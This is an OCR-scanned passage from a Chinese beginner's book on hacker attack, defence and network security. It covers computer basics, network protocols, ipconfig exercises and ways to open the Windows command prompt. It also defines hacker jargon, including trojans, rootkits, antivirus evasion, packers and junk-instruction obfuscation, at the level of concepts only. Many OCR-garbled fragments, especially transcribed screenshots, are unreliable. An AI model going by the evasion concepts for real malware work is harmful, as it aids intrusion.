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一 站 二 和 一 
有 亏 
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第 1 竟 


黑客 攻防 与 网 络 安全 


快速 入 门 


真正 的 黑客 并 不 只 是 攻击 ， 而 是 通过 攻击 来 研究 漏洞 ， 从 而 大 大 提高 系统 的 安全 性 。 
本 章 介 绍 黑客 攻防 与 网 络 安全 的 相关 基础 知识 ， 主 要 内 容 包括 怎样 从 零 开 始 学 黑客 攻防 技 


术 以 及 网 络 安全 中 的 相关 概念 等 。 


怎样 从 零 开始 学 黑客 


很 多 学 生 对 黑客 技术 很 感 兴趣 ， 但 是 
对 于 怎样 从 零 开 始 学 习 黑 客 知识 还 是 很 茫 
然 。 例 如 ， 不 知道 要 掌握 黑客 技术 应 该 学 
哪些 知识 ， 哪 些 知识 是 必 学 的 ， 要 掌握 黑 
客 编程 技术 应 该 学 习 哪 些 程序 开发 语言 ， 
学 会 之 后 要 干什么 ? 本 节 就 来 介绍 怎样 从 
零 开 始 学 黑客 技术 。 


1.1.1 计算 机 原理 很 重要 


在 学 习 黑 客 知识 之 前 ， 计 算 机 原理 是 
一 定 要 学 习 的 ， 从 中 可 以 了 解 很 多 未 来 会 
用 到 的 知识 ， 如 计算 机 的 工作 流程 、 数 据 
和 指令 的 存储 机 制 等 。 这 些 都 是 非常 重要 
的 知识 ， 如 果 这 些 都 不 懂 ， 那 还 谈 什 么 黑 
客 技术 呢 ? 


于 


1. 计算 机 的 工作 原理 


用 户 预先 要 把 指挥 计算 机 如 何 进行 操 
作 的 指令 序列 〈 称 为 程序 ) 和 原始 数据 通 
过 输入 设备 输送 到 计算 机 内 存储 器 (简称 
内 存 ) 中 。 这 些 指 令 中 的 每 一 条 指令 中 都 
会 明确 规定 计算 机 从 哪个 地 址 取 数 ， 进 行 
什么 操作 ， 然 后 送 到 什么 地 址 等 。 

计算 机 在 运行 时 ， 先 从 内 存 中 取出 第 
一 条 指令 ， 通 过 控制 器 的 译 码 ， 按 指令 的 
要 求 ， 从 存储 器 中 取出 数据 进行 指定 的 运 
算 和 逻辑 操作 等 加 工 ， 然 后 再 按 地 址 把 结 
果 送 到 内 存 中 去 。 接 下 来 ， 再 取出 第 二 条 


指令 ， 在 控制 器 的 指挥 下 完成 规定 操作 。 
依 此 进行 下 去 ， 直 至 遇 到 停止 指令 。 

程序 与 数据 一 样 存 储 ， 按 程序 编排 的 
顺序 ， 一 步 一 步 地 取出 指令 ， 自 动 完 成 指 
令 规定 的 操作 是 计算 机 最 基本 的 工作 原理 。 
这 一 原理 最 初 是 由 美 籍 匈牙利 数学 家 汉 “。 诺 
依 曼 (John von Neumann) 于 1945 年 提出 
来 的 ， 故 称 为 汉 。 诺 依 曼 原理 。 


2. 计算 机 的 系统 架构 


计算 机 系统 由 硬件 系统 和 软件 系统 两 部 
分 组 成 。 汉 “。 诺 依 曼 黄 定 了 现代 计算 机 的 基 
本 结构 ， 这 一 结构 又 称 冯 。 诺 依 曼 结构 ， 
其 特点 如 下 : 

(1) 使 用 单一 的 处 理 部 件 来 完成 计算 、 
存储 以 及 通信 的 工作 。 

(2) 存储 单元 是 定 长 的 线性 组 织 。 

(3) 存储 空间 的 单元 是 直接 寻 址 的 。 

(4) 使 用 低级 机 器 语言 ， 指 令 通过 操 
作 码 来 完成 简单 的 操作 。 

(5) 对 计算 进行 集中 的 顺序 控制 。 

(6) 计算 机 硬件 系统 由 运算 器 、 存储器 、 
控制 器 、 输入 设备 、 输 出 设备 五 大 部 件 组 成 ， 
并 规定 了 它们 的 基本 功能 。 

(7) 采用 二 进 制 形式 表示 数据 和 指令 。 

(8) 在 执行 程序 和 处 理 数据 时 必须 将 
程序 和 数据 从 外 存储 器 装 入 主 存储 器 中 ， 
然后 才能 使 计算 机 在 工作 时 自动 地 从 存储 
器 中 取出 指令 并 加 以 执行 。 
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1.1.2 了 解 黑客 相关 术语 


在 黑客 领域 中 ， 有 一 些 常用 术语 ， 如 
渗透 、DDoS、 旁 注 、WebShell、 注 入 等 ， 
需要 初学 者 了 解 ， 如 果 连 这 些 术语 都 不 知 
道 ， 那 真是 个 黑客 “菜鸟 ”了 ! 下 面 介绍 
黑客 领域 中 的 相关 术语 。 


1. 肉鸡 


所 谓 “ 肉 鸡 ” 是 一 种 比喻 ， 是 指 那些 
能 够 随意 被 黑客 操控 的 计算 机 ， 对 方 可 以 
是 Windows 系统 , 可 以 是 UNIX/Linux 系统 ， 
可 以 是 一 般 的 个 人 计算 机 ， 也 可 以 是 大 型 
的 服务 器 ， 能 够 像 操 作 自 己 的 计算 机 那样 
来 操作 它们 ， 而 不 被 对 方 所 发 觉 。 


2. 木马 


木马 是 那些 表面 上 伪装 成 了 正常 的 程 
序 ， 可 是 当 这 些 程序 被 运行 时 ， 就 会 获取 
系统 的 整个 操控 权限 。 有 很 多 黑客 就 是 热 
囊 于 运用 木马 程序 来 操控 别人 的 计算 机 ， 
如 灰 饮 子 、 黑 洞 、PcShare 等 。 


3. 网 页 木马 


网 页 木马 表面 上 伪装 成 一 般 的 网 页 文 
件 或 是 将 木马 代码 直接 插入 到 正常 的 网 页 
文件 中 ， 当 有 人 访问 网 页 时 ， 网 页 木马 就 
会 运用 对 方 系统 的 漏洞 主动 将 配置 好 的 木 
马 客户 端 下 载 到 对 方 的 计算 机 上 主动 运行 ， 
从 而 控制 目标 计算 机 。 


4. 挂 马 


挂 马 就 是 在 别人 的 网 站 文件 里 面 放 入 
网 页 木马 或 者 是 将 木马 代码 潜入 到 对 方正 
常 的 网 页 文件 里 ， 以 使 阅读 者 中 马 。 


5. 后 门 


后 门 是 指 一 种 绕 过 安全 性 操控 而 获取 
对 程序 或 系统 控制 权 的 办 法 。 在 软件 的 开 
发 阶段 ， 程 序 员 常会 在 软件 内 创建 后 门 以 
便 能 够 修正 程序 中 的 缺陷 。 如 果 后 门 被 其 


久 


他 人 知道 , 或 是 在 软件 发 布 之 前 没有 删除 ， 
那么 它 就 成 了 安全 隐患 。 一 般 大 多 数 的 特 
洛 伊 木 马 (Trojan Horse) 程序 都 能 够 被 入 
侵 者 用 于 制造 后 门 。 


6. Rootkit 


Rootkit 是 入 侵 者 用 来 隐藏 自己 的 行踪 
和 保留 root 控制 权限 的 程序 工具 。 一 般 ， 
入 侵 者 通过 入 侵 的 方式 获得 root 拜访 权限 
进入 系统 后 ， 再 通过 对 方 系统 内 存在 的 安 
全 漏洞 获得 系统 的 root 权限 。 最 后 ， 入 侵 
者 就 会 在 对 方 的 系统 中 安装 Rootkit， 以 达 
到 自己 长 久 操 控 对 方 计算 机 的 目的 。 


7. 弱 口令 


所 谓 弱 口令 是 指 密 码 与 用 户 名 相同 ， 
密码 为 空 的 用 户 名 与 密码 组 合 ， 也 包括 那 
些 密码 强度 不 够 ， 容 易 被 猜 解 的 组 合 ， 
似 123、abc 这 样 的 口令 (密码 ) 。 


8. Shell 


Shell 指 的 是 一 种 指令 执行 环境 ， 如 按 
Windows+R 组 合 键 ， 打 开 “ 运 行 ” 对 话 框 ， 
在 “打开 ”文本 框 中 输入 cmd， 单 击 “ 确 定 ” 
按钮 ， 就 会 弹出 一 个 用 于 执行 指令 的 窗口 ， 
这 个 就 是 Windows 的 Shell 执行 环境 ， 也 被 
称 为 “命令 提示 符 ” 窗 口 ， 如 下 图 所 示 。 


Wndow 要 柜 这 和 的 名 乏 ， 力作 打 开 相 应 的 得 
文件 夫 、 文 村 或 Internet 资源 
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9. 溢出 

确切 地 讲 ， 所 谓 “溢出 ”应 该 是 “组 
冲 区 溢出 ”。 简 单 的 解释 就 是 程序 对 接收 的 
输入 数据 没有 履行 有 效 的 检测 而 导致 过 错 ， 
后 果 可 能 是 造成 程序 崩溃 或 者 是 履行 入 侵 
者 的 指令 。 大致 分 为 两 类 : 堆 溢 出 和 栈 溢出 。 


10. 免 杀 


免 杀 是 通过 加 壳 、 加 密 、 修 正 特征 码 、 
加 花 指令 等 技能 来 修正 程序 ， 使 其 逃 过 杀 
毒 软件 的 查 杀 。 


11. 加 壳 

加 壳 是 运用 特别 的 算法 ， 将 exe 可 执行 
程序 或 者 dll 动态 链接 库 文 件 的 编码 进行 改 
变 〈 如 实现 压缩 、 加 密 ) ， 以 达到 缩小 文件 
体积 或 者 加 密 程序 编码 ， 甚 至 是 向 过 杀毒 
软件 查 杀 的 目的 。 目 前 较 常用 的 加 壳 工具 
有 UPX、ASPack、PePack、PECompact、 
UPack、 免 疫 007、 木 马 彩 衣 等 。 


12. 花 指 令 


花 指令 是 几 条 汇编 指令 ， 让 汇编 语句 
进行 一 些 跳 转 ， 使 得 杀毒 软件 不 能 正常 判 
断 病 毒 文 件 的 结构 。 通 俗 来 讲 ， 就 是 杀毒 
软件 是 从 头 到 脚 按 顺序 来 查找 病毒 ， 如 果 
把 病毒 的 头 和 脚 颠 倒 位 置 ， 杀 毒 软件 就 找 
不 到 病毒 了 。 


1.1.3 ”掌握 黑客 技术 应 学 习 的 编程 技术 
有 哪些 

很 多 黑客 初学 者 会 遇 到 一 个 问题 ， 那 
就 是 黑客 需要 学 习 编 程 知识 吗 ? 答案 是 肯 
定 的 ， 那 么 需要 学 习 哪 些 编程 知识 呢 ? 其 
实 这 与 个 人 的 爱好 与 发 展 方向 有 关 ， 如 果 
是 要 对 网 站 进行 安全 漏洞 检测 ， 就 应 该 学 
会 HIML、PHP、 数 据 库 等 编程 语言 ， 如 
果 对 程序 开发 有 兴趣 的 话 ， 可 以 学 Java、 
C++、Python 等 开发 性 语言 。 不 过 ， 每 种 语 


第 1 章 黑客 攻防 与 网 络 安全 快速 入 门 


言 都 有 它 的 优点 和 缺点 ， 需 要 通过 自己 的 
筛选 进行 选择 性 学 习 。 


1.1.4 学 习 的 耐心 很 重要 


学 黑客 技术 的 人 很 多 , 失败 的 人 也 很 多 ， 
这 是 因为 一 些 初学 者 一 旦 遇 到 解决 不 了 的 问 
题 ， 就 放弃 了 ; 或 者 三 天 打 鱼 两 天 晒 网 ， 刚 
开始 有 热情 ， 到 了 后 面 就 没 兴趣 了 。 所 以 只 
有 真正 热爱 黑客 技术 的 人 ， 才 能 坚持 下 来 ， 
这 就 需要 学 习 的 耐心 了 。 


1.1.5 ”黑客 技术 未 来 方向 在 哪里 


黑客 技术 真正 的 未 来 在 于 安全 方面 
因为 只 有 安全 才 对 社会 的 发 展 有 意义 ， 那 
些 对 社会 有 意义 的 东西 才能 长 久 的 生存 下 
来 。 为 此 ， 现 在 的 黑客 一 般 都 会 转型 做 网 
络 安全 ， 因 为 网 络 安全 研究 的 是 攻防 兼备 ， 
这 是 社会 发 展 的 必然 趋势 。 


1.2 ”网络 安全 中 的 相关 概念 


在 网 络 安全 中 ， 经 常会 接触 到 很 多 和 
网 络 有 关 的 概念 ， 如 浏览 器 、URL、FTP、 
JP 地 址 及 域名 等 ， 理 解 了 这 些 概 念 ， 对 网 
络 安全 有 一 定 的 帮助 。 


1.2.1 互联 网 与 因特网 


互联 网 是 指 将 两 台 计算 机 或 者 是 两 台 
以 上 的 计算 机 终端 ”客户 端 ”服务 端 通过 
计算 机 信息 技术 的 手段 互相 联系 起 来 的 结 
果 。 互 联网 在 现实 生活 中 应 用 很 广泛 ， 在 
互联 网 上 人 们 可 以 聊天 、 玩 游戏 、 查 阅 资 
料 等 。 互 联网 是 全 球 性 的 ， 这 就 意味 着 这 
个 网 络 不 管 是 谁 发 明 的 ， 它 总 是 属于 全 人 
类 的 。 

因特网 是 一 个 把 分 布 于 世界 各 地 的 计 
算 机 用 传输 介质 互相 连接 起 来 的 网 络 。 因 
特 网 是 基于 TCP/IP 实现 的 。TCP/IP 由 很 多 
协议 组 成 ， 不 同类 型 的 协议 又 被 放 在 不 同 
的 层 ， 其 中 ， 位 于 应 用 层 的 协议 就 有 很 多 ， 
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如 FTP、SMTP、HTTP。 


1.2.2 万 维 网 与 浏览 器 


万 维 网 (World Wide Web，WWW) 简 
称 为 3W， 它 是 无 数 个 网 络 站 点 和 网 页 的 
集合 ， 也 是 Intemet 提供 的 最 主要 的 服务 。 
它 是 由 多 媒体 链接 而 形成 的 集合 ， 通 常人 
们 上 网 看 到 的 内 容 就 是 万 维 网 的 内 容 。 如 
下 图 所 示 为 使 用 万 维 网 打开 的 百度 首页 。 


请 让- 国 wpwrrvbadren -ol ie-T. ews @ 


| ss 
侈 提示 : 互联 网 、 因 特 网 、 万 维 网 三 者 的 


关系 是 : 互联 网 包含 因特网 ， 因 特 网 包含 万 
维 网 。 凡 是 能 彼此 通信 的 设备 组 成 的 网 络 就 
叫 互联 网 。 所 以 ， 即 使 仅 有 两 台 机 器 ， 不 论 
用 何 种 技术 使 其 彼此 通信 ， 也 都 叫 互联 网 。 


浏览 器 是 将 互联 网 上 的 文本 文档 (或 
其 他 类 型 的 文件 ) 翻译 成 网 页 ， 并 让 用 户 
与 这 些 文件 交互 的 一 种 软件 工具 ， 主 要 用 
于 查看 网 页 的 内 容 。 目 前 最 常用 的 浏览 器 
为 微软 公司 的 Intemet Explorer (通常 称 为 
正 浏 览 器 ) ， 如 下 图 所 示 是 使 用 正 浏览 器 
打开 的 页 面 。 


1.2.3 ”URL 地 址 与 域名 


URL (Uniform Resource Locator) 即 统 
一 资源 定位 器 ， 也 就 是 网 络 地 址 ， 是 在 因 特 
网 上 用 来 描述 信息 资源 ， 并 将 因特网 提供 
的 服务 统一 编 址 的 系统 。 简 单 来 说 ， 通 常 在 
正 或 Netscape 中 输入 的 网 址 就 是 URL 的 一 
种 ， 如 百度 网 址 http://www.baidu.com。 

域名 (Domain Name) 类似 于 因特网 上 
的 门牌 号 ， 是 用 于 识别 和 定位 互联 网 上 计算 
机 层次 结构 的 字符 标识 ， 与 该 计算 机 的 因 特 
网 协议 (IP〉 地 址 相对 应 。 但 相对 于 下 地 
址 而 言 ， 域 名 更 便于 使 用 者 理解 和 记忆 。 
URL 和 域名 是 两 个 不 同 的 概念 ， 如 http:/ 
www.sohu.com/ 是 URL, 而 www.sohu.com 是 
域名 ,如 下 图 所 示 为 使 用 URL 打开 的 网 页 。 
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1.2.4 IP 与 MAC 地 址 


卫 地 址 用 于 在 TCPMP 通信 协议 中 标 
记 每 台 计 算 机 的 地 址 ， 通 常 使 用 十 进 制 来 
表示 ， 如 192.168.1.100。 但 在 计算 机 内 
部 ， 卫 地 址 是 一 个 32 位 的 二 进 制 数 值 ， 
如 11000000 10101000 00000001 00000110 

(192.168.1.6) 。 

MAC 地 址 与 网 络 无 关 ， 即 无 论 将 带 有 
这 个 地 址 的 硬件 〈 如 网 卡 、 集 线 器 、 路 由 器 
等 ) 接 入 到 网 络 的 何 处 ， 都 是 相同 的 MAC 
地 址 ， 它 由 厂商 写 在 网 络 硬件 的 BIOS 里 。 

MAC 地 址 通常 表示 为 12 个 十 六 进 制 
数 ， 每 两 个 十 六 进 制 数 之 间 用 冒号 隔 开 ， 
如 08:00:20:0A:8C:6D 就 是 一 个 MAC 地 
址 ， 其 中 前 6 位 〈08:00:20) 代表 网 络 硬件 


制造 商 的 编号 ， 它 由 IEEE 分 配 ， 而 后 6 位 
(0A:8C:6D) 代表 该 制造 商 所 制造 的 某 个 
网 络 产品 〈 如 网 卡 ) 的 系列 号 。 每 个 网 络 
制造 商 必 须 确保 它 所 制造 的 每 个 以 太 网 设 
备 前 6 个 字 节 都 相同 ， 后 6 个 字 节 不 同 ， 
这 样 ， 就 可 以 保证 世界 上 每 个 以 太 网 设备 
都 具有 唯一 的 MAC 地 址 。 


侈 提示 : IP 地 址 与 MAC 地 址 的 区 别 在 于 : 
了 地 址 基于 逻辑 , 比较 灵活 , 不 受 硬 件 限制 ， 
也 容易 记忆 。MAC 地 址 在 一 定 程度 上 与 硬 
件 一 致 ， 基 于 物理 ， 能 够 具体 标识 。 这 两 
种 地 址 均 有 各 自 的 长 处 ， 使 用 时 也 因 条 件 
不 同 而 采取 不 同 的 地 址 。 


1.3 认识 网 络 通 信 中 的 协议 


“网 络 通信 协议 ”是 计算 机 网 络 的 一 个 
重要 组 成 部 分 ， 是 不 同 网 络 之 间 通 信 、“ 交 
流 ” 的 公共 语言 。 有 了 它 ， 使 用 不 同系 统 
的 计算 机 或 网 络 之 间 才 可 以 彼此 识别 ， 识 
别 出 不 同 的 网 络 操作 指令 ， 建 立信 任 关系 。 


13T HTTP 


HITP (HyperText Transfer Protocol， 超 文 
本 传输 协议 ) 是 用 于 从 WWW 服务 器 传输 
超 文 本 到 本 地 浏览 器 的 传送 协议 。 它 可 以 
使 浏览 器 更 加 高 效 显 示 网 页 内 容 。 该 协议 
不 仅 能 保证 计算 机 正确 快速 地 传输 超 文本 
文档 ， 还 能 确定 传输 文档 中 的 哪些 内 容 首 
先 显示 〈 如 文本 先 于 图 形 ) 等 。 


13.2 TCP/IP 


TCPP 包括 两 个 子 协议 ， 即 TCP 

(Transmission Control Protocol， 传 输 控 制 

协议 ) 和 IP 〈Intemet Protocol， 网 际 协议 ) 。 

在 这 两 个 子 协议 中 又 包括 许多 应 用 型 的 协 
议和 服务 ， 使 得 TCP/IP 的 功能 非常 强大 。 

TCP/IP 中 除了 包括 TCP、 卫 两 个 协议 

外 ， 还 包括 许多 子 协议 。 它 的 核心 协议 包 
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括 用 户 数据 报 协议 (UDP) 、 地 址 解析 协议 
(ARP) 及 因特网 控制 消息 协议 (ICMP) 等 。 
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IP， 即 互联 网 协议 (Imtemet Proto- 
col), IP 可 实现 两 个 基本 功能 寻 址 和 分 段 。 
IP 可 以 根据 数据 报 报 头 中 包含 的 目的 地 址 
将 数据 报 传送 到 目的 地 址 。 另 外 ，IP 使 用 4 
个 关键 技术 提供 服务 : 服务 类 型 、 生 存 时 间 、 
选项 和 报头 校 验 码 。 

IP 的 基本 任务 是 通过 互联 网 传送 数据 
报 ， 各 个 卫 数 据 报 之 间 是 相互 独立 的 。 卫 
从 源 运输 实体 取得 数据 ， 通 过 它 的 数据 链 
路 层 服务 传 给 目的 主机 的 他 层 。 在 传送 时 ， 
高 层 协 议 将 数据 传 给 全，IP 再 将 数据 封装 
为 互联 网 数据 报 ， 并 交 给 数据 链 路 层 协 议 
通过 局 域 网 传送 。 


1.3.4 ARP 


ARP (Address Resolution Protocol， 地 址 
解析 协议 ) 基本 功能 就 是 通过 目标 设备 的 
卫 地 址 ， 查 询 目标 设备 的 MAC 地 址 ， 以 保 
证 通信 的 顺利 进行 。 在 局 域 网 中 ， 网 络 中 
实际 传输 的 是 “ 帧 ”， 帧 里 面 是 有 目标 主机 
的 MAC 地 址 的 。 

在 以 太 网 中 ， 一 个 主机 要 和 另 一 个 主 
机 进行 直接 通信 ， 必 须要 知道 目标 主机 的 
MAC 地 址 ， 这 个 MAC 地 址 就 是 通过 地 址 
解析 协议 获得 的 。 所 谓 “ 地 址 解析 ”就 是 
主机 在 发 送 数据 帧 前 将 目标 卫 地 址 转换 成 
目标 MAC 地 址 的 过 程 。 


1.3.5 ICMP 


ICMP (Internet Control Message Proto- 
col， 因 特 网 控制 消息 协议 ) 是 TCP/IP 中 的 
子 协议 ， 主 要 用 于 在 卫 主机、 路 由 器 之 间 
传递 控制 消息 。 控 制 消息 是 指 网 络 通 不 通 、 
主机 是 否 可 达 、 路 由 是 否 可 用 等 网 络 本 身 
的 消息 。 这 些 控制 消息 虽然 并 不 包含 用 户 
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数据 ， 但 是 对 于 用 户 数 据 的 传递 起 着 重要 
作用 。 

ICMP 对 于 网 络 安全 非常 重要 ，ICMP 
本 身 的 特点 决定 了 它 非 常 容易 被 用 来 攻击 
网 络 上 的 路 由 器 和 主机 。 例 如 ， 可 以 利用 
操作 系统 规定 的 ICMP 数据 包 最 大 尺寸 不 
超过 64KB 这 一 规定 ， 向 主机 发 起 Ping of 
Death (死亡 之 Ping) 攻击 。 


1.4 实战 演练 


实战 演练 1 一 一 获取 本 机 的 IP 地 址 


9 在 互联 网 中 ， 一 台 主 机 只 有 一 个 他 地 
” 址 ， 因 此 ， 黑 客 要 想 攻 击 某 台 主机 ， 必 须 
找到 这 人 台 主 机 的 卫 地 址 ， 然 后 才能 进行 入 
侵 攻击 ， 可 以 说 耳 地 址 是 黑客 实施 入 侵 攻 
击 的 一 个 关键 。 使 用 ipconfig 命令 可 以 获 
取 本 地 计算 机 的 耳 地 址 ， 具 体 的 操作 步骤 
如 下 。 

BEep 国 右 去“ 开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “运行 ”菜单 命令 ， 如 下 图 所 示 。 


搜索 (S) 


运行 (R) 从 


关机 或 注销 (U) 
桌面 (D) 


一 


Estee 图 打开 “运行 ”对 话 框 ， 在 “打开 ” 文 
本 框 中 输入 cmd， 如 下 图 所 示 。 


可 运行 x 


苛 。 Windows 将 恨 你 所 过 入 的 和 各 ,为 人 打开 查 羡 的 季 
文件 夫 、 文 人 或 Internet 资源 


#7F(O): |cmd| 


Esl EE 


SB 


[step 图 单 击 “ 确 定 ” 按 钮 ， 打开“ 命令 提示 
符 ” 窗 口 ， 在 “命令 提示 符 ” 窗 口中 输入 
ipconfig 命令 ， 按 Enter 键 ， 即 可 显示 出 本 
机 的 全 配置 相关 信息 ， 如 下 图 所 示 。 


对 体 已 疡 开 连 撞 
DCP HOST 
。: 媒体 已 断 开 连 接 


检 体 已 扬 开 连 换 


.+ DHCP HOST 


以 太 网 笑 配 舌 蓝 开 | 


Ee 


;球体 已 疡 开 连 所 


侈 提示 : 在 “命令 提示 符 ” 窗 口中 ， 
192.168.0.130 表示 本 机 在 局 域 网 中 的 IP 
地 址 。 


实战 演练 2 一 一 获取 本 机 的 MAC 地 址 


在 “命令 提示 符 ”窗口 中 输入 ipconfiglall 局 
命令 ， 然 后 按 Enter 键 ， 可 以 在 显示 的 结果 
中 看 到 一 个 MAC 地 址 : 00-23-24-DA-43- 
8B， 这 是 本 机 的 物理 地 址 ， 也 是 本 机 的 网 
卡 地 址 ， 它 是 唯一 的 ， 如 下 图 所 示 。 


画 cxwNpcwsveceemazema ewe - oO x 


:Nersvaianguyipeonfia /a1l 
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23-24-DA-43-88 


; 机 休 已 断 开 连 接 


EE 


小 试 身手 
练习 1: 显示 系统 文件 的 扩展 名 


Windows 10 系统 默认 情况 下 并 不 显示 
文件 的 扩展 名 ， 用 户 可 以 通过 设置 显示 文 
件 的 扩展 名 。 具 体 的 操作 步骤 如 下 。 


国史 加 


step 国 单 去 “开始 ”按钮 ， 在 弹出 的 菜单 中 
选择 “文件 资源 管理 器 ”选项 ， 打 开 “ 文 
件 资源 管理 器 ”窗口 ， 如 下 图 所 示 。 


站 “mHz 人 夫人 
4 全 ， 避 尘 
， 入 
Er 


禁 竹 了 肌 后 从 入 门 到 三 惠 [人 
本 onebmve 

EE 

国 W5 

辐 加 上 

业 便 
TH 


[step 图 选择 “查看 ”选项 卡 ， 在 打开 的 功能 
区 域 中 选中 “显示 /隐藏 ”区 域 的 “文件 扩 
展 名 ” 复 选 框 ， 如 下 图 所 示 。 
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Ee 


此 时 打开 一 个 文件 夹 ， 用 户 便 可 以 查 
看 到 文件 的 扩展 名 ， 如 下 图 所 示 。 
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第 1 章 黑客 攻防 与 网 络 安全 快速 入 门 ES 


练习 2: 快速 锁定 Windows 桌 面 


在 离开 计算 机 时 ， 可 以 将 计算 机 锁 屏 ， 
这 样 可 以 有 效 地 保护 桌面 隐私 ， 主 要 有 两 
种 快速 锁 屏 的 方法 。 

(1) 使 用 菜单 命令 : 按 Windows 键 ， 
弹出 “开始 ”菜单 ， 单 击 账户 头像 ， 在 弹 
出 的 快捷 菜单 中 选择 “锁定 ”命令 ， 即 可 
进入 锁 屏 界面 ， 如 下 图 所 示 。 


(2) 使 用 快捷 键 : 按 Windows+L 组 合 
键 ， 可 以 快速 锁定 Windows 系统 ， 进 入 锁 
屏 界面 ， 如 下 图 所 示 。 


第 2 音 Windows 中 的 DOS 窗 口 与 
DOS 命 令 


作为 计算 机 或 网 络 终端 设备 的 用 户 ， 要 想 使 自己 的 设备 不 受 或 少 受 黑客 的 攻击 ， 有 必 
要 了 解 一 些 计算 机 中 的 基础 知识 ， 本 章 介绍 Windows 系 统 中 的 命令 行 与 DOS 命 令 ， 主 要 内 
容 包括 认识 Windows 系 统 中 的 窗口 和 黑客 常用 DOS 命 令 的 应 用 等 。 


2.1 认识 Windows 10 系 统 中 
DOS 窗 口 


Windows 10 操作 系统 中 的 DOS 窗口 ， 
也 被 称 为 “命令 提示 符 ” 窗 口 ， 该 窗口 主 
要 以 图 形 化 界面 显示 ， 用 户 可 以 很 方便 地 
进入 DOS 命令 窗口 并 对 窗口 中 的 命令 行进 
行 相应 的 编辑 操作 。 


绝招 1: 使 用 菜单 的 形式 进入 DOS 窗 口 


和 Windows 10 的 图 形 化 界面 缩短 了 人 与 
机 器 之 间 的 距离 ， 通 过 使 用 菜单 可 以 很 方 
便 地 进入 DOS 窗口 ， 具 体 的 操作 步骤 如 下 。 
[Sep 国 单 击 桌 面 上 的 “开始 ”按钮 ， 在 弹出 
的 菜单 列表 中 选择 Windows 一 “命令 提示 
符 ” 菜 单 命令 ， 如 下 图 所 示 。 


命令 提示 符 
闫 ] 任务 管理 器 
文件 资源 管理 器 


运行 


图 winrar 


ID 


Ee 加 弹出 “管理 员 命令 提示 符 ” 窗 口 ， 
在 其 中 可 以 执行 相关 DOS 命令 ， 如 下 图 
所 示 。 


国 | 管理 只; 命令 提示 符 = 口 x 


icrosoft Windows [版 本 10. 0. 16299. 936] 
(c) 2017 Jicrosoft Corporation。 保留 所 有 权利 。 


:\Users\Administrator> 


绝招 2: 通过 
窗口 


“运行 ”对 话 框 进入 DOS 


除 使 用 菜单 的 形式 进入 DOS 窗口 ， 用 
户 还 可 以 通过 “运行 ”对 话 框 进入 DOS 窗 
口 ， 具 体 的 操作 步骤 如 下 。 
[ee 加 在 Windows 10 操作 系统 中 ， 右 击 桌 
上 的 “开始 ”按钮 ， 在 弹出 的 快捷 菜单 中 
如 下 图 所 示 。 


选择 “运行 ”菜单 命令 ， 


[tes 图 打开 “运行 ”对 话 框 ， 在 “运行 ” 文 
本 框 中 输入 cmd， 如 下 图 所 示 。 


第 2 章 Windows 中 的 DOS 窗 口 与 DOS 命 令 


杏 运行 x 


画 Windows 梅 恨 据 你 所 蛤 入 的 名 称 ， 为 你 打开 柜 应 的 程序 
文件 夹 . 文档 或 Internet 资源 . 


打开 [cmd| 
四 全 用 生理 权限 创建 此 任务 。 


wa 


[step 图 单 击 “确定 ”按钮 ， 即 可 进入 DOS 
窗口 ， 如 下 图 所 示 。 


国 管理 员 : CN\windows\system32\Vcmd.exe 一 口 x 


Microsoft Windows [版 本 10. 0. 16299. 936] 
(ce) 2017 Jicrosoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administrator> 


济 痪 (B)… 


弹 台 绝招 3: 通过 IE 浏览 器 访问 DO9 窗 口 
下 浏览 器 和 “命令 提示 符 ” 窗 口 关 系 
密切 ， 用 户 可 以 直接 在 正 浏 览 器 中 访问 
DOS 窗口 。 下 面 以 在 Windows 10 操作 系统 
下 访问 DOS 窗口 为 例 ， 具 体 的 方法 如 下 。 
在 Microsoft Edge 浏览 器 的 地 址 栏 中 
输入 c:\Windows\system32\cmd.exe, 按 Enter 


键 即 可 进入 DOS 窗口 。 

而 虽 | O 3co 索 , so# 惠 。 x 十 as 
;》 中 俐 。 轩 cwindowsvystemazcmdenx 太 Sa 

左 file:///e/Windows/system32/cmd.exe 网 站 


万 cAwindows\system32\cmd.exe 


( 〇 .360 搜 索 


国 管理: C\WWindows\System32\cmd.exe 一 口 x 


icrosoft Windows [版 本 10. 0. 16299. 936] 
(c) 2017 JHi crosoft Corporation。 保 留 所 有 权利 。 


: \Windows\System32> 


v 


全 注意 在 输入 地 址 时 , 一 定 要 输入 全 路 径 ， 
否则 Windows 无 法 打开 “命令 提示 符 ” 窗 口 。 


绝招 4: 编辑 “命令 提示 符 ” 窗 口中 的 转 
代码 


当 在 Windows 10 中 启动 命令 行 ， 就 会 

弹出 相应 的 命令 行 窗 口 ， 在 其 中 显示 当前 
操作 系统 的 版 本 号 ， 并 把 当前 用 户 默认 为 
当前 提示 符 。 在 使 用 命令 行 时 可 以 对 命令 
行进 行 复 制 、 粘 贴 等 操作 ， 有 具体 操作 步骤 
如 下 。 
[sep 国 右 击 “ 命 令 提 示 符 ”窗口 标题 栏 ， 将 
弹出 一 个 快捷 菜单 。 在 这 里 可 以 对 当前 窗 
口 进行 各 种 操作 ， 如 移动 、 最 大 化 、 最 小 
化 、 编 辑 等 。 选 择 此 菜单 中 的 “编辑 ” 命 
令 ， 在 显示 的 子 菜单 中 选择 “标记 ”选项 ， 
如 下 图 所 示 。 


画 等到 5 IR - oO x 
Microso: . 0. 16299, 936] 
Ce) R2011 tan。 保留 所 有 权利 。 
大 小 (5) 
C:\User: -~ 最 小 化 N) 
口 最 大 化 %) 
x 关闭 (GO 
于 认 值 [D) 复 草 (Y) 民 Enter 
尾 性 (P) 蒜 贴 (p) Ctrl-V 
全 迁 (S) Ctrl-A 
滚动 D 
查找 (有.… Ctrl-F 


[step 图 移动 光标 ， 选 择 要 复制 的 内 容 ， 可 以 
直接 按 Enter 键 复制 该 命令 行 ， 也 可 以 通过 
选择 “编辑 ”一 “复制 ”菜单 项 来 实现 ， 
如 下 图 所 示 。 


黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


国资 避 未 R) Ce dd 
Micro 10. 0. 16299. 936. 
2 ration。 保 留 所 有 权利 。 
上 :\Us _ 县 小 化 (N) 
口 最 大 化 9 
x 关闭 (QO 
标 i Ci-M 
默认 值 (D) 
属性 (P) 粘贴 (站 Cerl-V 
全 (5) Ctr-A 
溢 动 D 
家 (D.Ctrl-F 时 


[step 图 在 需要 粘贴 该 命令 行 的 位 置 处 右 击 ， 
